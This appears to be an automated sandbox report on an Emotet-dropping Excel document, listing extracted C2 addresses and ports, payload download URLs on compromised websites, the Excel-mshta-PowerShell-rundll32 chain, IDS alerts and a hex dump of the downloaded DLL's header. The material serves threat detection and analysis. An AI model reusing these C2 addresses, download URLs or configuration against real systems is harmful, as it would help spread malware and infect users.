                            Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/Avira URL Cloud: Label: malware
                            Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/Avira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 16.2.rundll32.exe.320000.3.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\JooSee.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB4 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb: source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdbm source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002B7E00 FindFirstFileW,16_2_002B7E00

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
                            Source: global trafficDNS query: name: weezual.fr
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80Jump to behavior
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: global trafficHTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /Fox-CCFS/zBdGqiyW1HTZD2j/ HTTP/1.1Host: mycloud.suplitecmo.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.27set-cookie: 61f44686eb699=1643398790; expires=Fri, 28-Jan-2022 19:40:50 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Fri, 28 Jan 2022 19:39:50 GMTexpires: Fri, 28 Jan 2022 19:39:50 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="10ZDUhs9FtE0wMo.dll"content-transfer-encoding: binarycontent-length: 548864date: Fri, 28 Jan 2022 19:39:50 GMTserver: LiteSpeedData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program c
                            Source: global trafficHTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: unknownNetwork traffic detected: IP country count 21
                            Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: mshta.exe, 00000004.00000003.420818085.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439097274.0000000003CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.html
                            Source: mshta.exe, 00000004.00000003.436214904.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.438128891.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420818085.000000000041D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.html#H
                            Source: mshta.exe, 00000004.00000003.436133193.00000000003EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420800489.00000000003EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437986864.00000000003EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.html(
                            Source: NZW-010122 BNUV-280122.xls.0.drString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlB
                            Source: mshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlT
                            Source: mshta.exe, 00000004.00000002.437108931.0000000000330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000003.422944437.0000000002DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.422354344.0000000002DF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.html
                            Source: mshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmli
                            Source: mshta.exe, 00000004.00000002.437108931.0000000000330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlmshta
                            Source: mshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlngs
                            Source: mshta.exe, 00000004.00000003.420780191.00000000003B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.htmly
                            Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.p
                            Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.682696599.000000001B91A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.png
                            Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/cc/vv/fe.pngPE
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ancyh.xyz
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/PE
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://chupahfashion.com/eh6bwxk
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                            Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                            Source: rundll32.exe, 00000010.00000002.677072808.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                            Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                            Source: rundll32.exe, 00000010.00000002.677072808.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.16.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: rundll32.exe, 00000010.00000002.677072808.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enZ6oW.
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://danahousecare.com/wp-cont
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firstfitschool.com/83wg6z
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://michaelcrompton.co.uk/wp-
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/PE
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.s
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.suplitecmo.com
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.suplitecmo.com/Fo
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                            Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sep.dfwso
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sep.dfwsolar.club/hzh3v/z
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stancewheels.com/wp-admin
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.f
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.fr
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.fr/ju9c/twEHJDCvN
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE
                            Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                            Source: powershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: powershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                            Source: mshta.exe, 00000004.00000003.420721916.0000000003C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/AUhFYYAjKIJ
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hekmat20.com/wp-includes
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hekmat20.com/wp-includes/7/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hekmat20.com/wp-includes/7/PE
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lambayeque.apiperu.net.p
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE
                            Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belajarngaji.shop/wp
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/
                            Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE
